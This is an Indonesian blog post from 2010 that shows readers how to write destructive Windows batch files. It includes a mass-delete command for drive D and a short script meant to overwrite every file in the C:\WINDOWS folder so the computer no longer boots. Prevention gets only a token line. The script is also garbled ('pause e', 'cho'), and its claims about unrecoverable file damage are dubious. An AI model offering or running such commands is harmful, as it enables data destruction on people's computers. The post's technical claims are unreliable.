Selasa, 23 November 2010

Celah Keamanan Windows Melaui Command Prompt

Temen2 passsti pernah denger command prompt kan??! Yups, bener banget command prompt atau yang sering disebut orang DOS ini ternyata bisa menjadi Boomerang dan celah keamanan yang amat berbahaya! Kok bisa??! Padahal cuman tampilan item dengan tulisan warna putih aja??! Ya jelas bisa . . . pengen tau kenapa??! To pengen tau caranya .. . hayo . . . ya udah ga usah malu2… . lanjutin aja bacanya . . . tapi jangan disalahgunakan ya. . . .

Yups! Jelas bisa temen2 . . . . pasalnya, selain digunakan untuk mengontrol windows dengan cara mengetikan perintah to command2 secara langsung diarea kerja DOS, command prompt  juga bisa dijalankan melalui batching....! apaan sich bacin- bacin tuh kak . . . Q jadi bingung . . .! eh bukan bacin tau!! Tap batching . . yaitu remote command prompt dengan suatu perintah yang dituliskan pada sebuah file yang berekstensi .bat! jadi hanya dengan meng-eksekusi file .bat nya, semua perintah pun dijalankan! Contohnya sederhananya aja perintah delete, bayangin aja jika perintah ini di batch in, d:/del*.*??!! habiz deh semua file di drive D! Ngeri banget bukan . .  ada lagi yang ga kalah ngerinya, yaitu dengan batching injected file. Metode menginjeksi file (file apapun) dan membuat file tersebut rusak dan TIDAK AKAN BISA DIREPAIR LAGI... termasuk file image seperti bmp, psd, jpeg, jpg, gif dan ico. Hanya dengan syntax sederhana sebagai berikut:

@echo on

echo This method will injects your files in rootdirectory

pause e

cho are you sure/ if yes press enter, if not press alt+F4

echo InjectFile > C:\WINDOWS\*.*

exit

jika injeksi metode batching ini anda jalankan dengan mengetikkan syntax di atas dan menyimpannya dengan ekstensi ".bat" dan anda double click, maka rusaklah semua file yang sedang tidak aktif dalam folder WINDOWS. Dan alhasil ketika kamu restart, komputermu udah wafat... alias modarrrrrr!!!!

Tindakan pencegahan (file bat sederhana):

- Hindari eksekusi langsung file .bat

- Gunakan deepfreeze

-eh iiya. . . satu lage . .  at2 dijalan yach ... loch?!@#$%&$#

Udah dulu temen2 semoga bermanfaat dan semoga membuat kalian semakin waspada dan tidak menyepelekan hal yang sederhana sekalipun! Karena dibalik kesederhanaan, tersimpan sesuatu yang besar, yang tidak boleh diketahui oleh orang laen . . .! Ingat itu!!

Tidak ada komentar:

Posting Komentar